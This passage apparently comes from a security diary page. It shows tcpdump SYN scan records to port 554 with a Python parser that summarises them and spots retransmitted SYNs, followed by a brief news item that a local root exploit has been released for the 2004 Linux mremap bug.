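08:21:47.611209 63.201.91.4.1558 > 1.1.1.1.554: S [tcp sum ok]
1231748817:1231748817(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
(ttl 110, id 45589, len 48)

21:55:39.377217 68.145.244.127.4500 > 1.1.1.1.554: S [tcp sum ok]
2723306309:2723306309(0) win 16384 <mss 1460,nop,nop,sackOK> (DF)
(ttl 108, id 29929, len 48)

21:55:42.342745 68.145.244.127.4500 > 1.1.1.1.554: S [tcp sum ok]
2723306309:2723306309(0) win 16384 <mss 1460,nop,nop,sackOK> (DF)
(ttl 108, id 30326, len 48)

16:36:58.621260 203.87.51.2.2718 > 1.1.1.1.554: S [tcp sum ok]
1528706769:1528706769(0) win 8192 <mss 1460> (DF)
(ttl 112, id 50200, len 44)
"""

RECORD = re.compile(  # one record = the three physical lines shown above
    r"(?P<time>\d\d:\d\d:\d\d\.\d+) "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): (?P<flags>\S+) .*?\n"
    r"(?P<seq>\d+):\d+\(\d+\) win (?P<win>\d+) <(?P<opts>[^>]*)>.*?\n"
    r"\(ttl (?P<ttl>\d+), id (?P<ipid>\d+), len (?P<len>\d+)\)"
)

def parse(text):
    """One dict per packet; purely numeric fields (ports, seq, ttl, ...) become ints."""
    return [{k: int(v) if v.isdigit() else v for k, v in m.groupdict().items()}
            for m in RECORD.finditer(text)]

def summarise(packets):
    """Per source: number of SYNs to port 554 and whether one was retransmitted.
    A repeat of (sport, seq) with a new IP id is the sender's stack retrying a
    SYN that got no answer, i.e. the drop was silent, as the diary notes."""
    by_src = defaultdict(list)
    for p in packets:
        if p["flags"] == "S" and p["dport"] == 554:
            by_src[p["src"]].append(p)
    return {src: {"syns": len(ps),
                  "retransmit": len({(p["sport"], p["seq"]) for p in ps}) < len(ps)}
            for src, ps in by_src.items()}
```

Running `summarise(parse(SAMPLE))` shows 68.145.244.127 sending the same SYN twice about three seconds apart, while the other two sources each appear once.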

-----------------------------------------------------------

A local root exploit was released today for Linux kernels vulnerable to
the mremap bug previously disclosed on February 18, 2004. This exploit
was released by the vulnerability researchers at ISEC, the same folks
that found the initial vulnerability.

This exploit has been confirmed to work on Linux kernels below 2.4.25.
Kernel versions 2.4.22 and 2.4.24 were tested and both were exploited
successfully to gain a local root shell.

http://www.isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt

0 Comments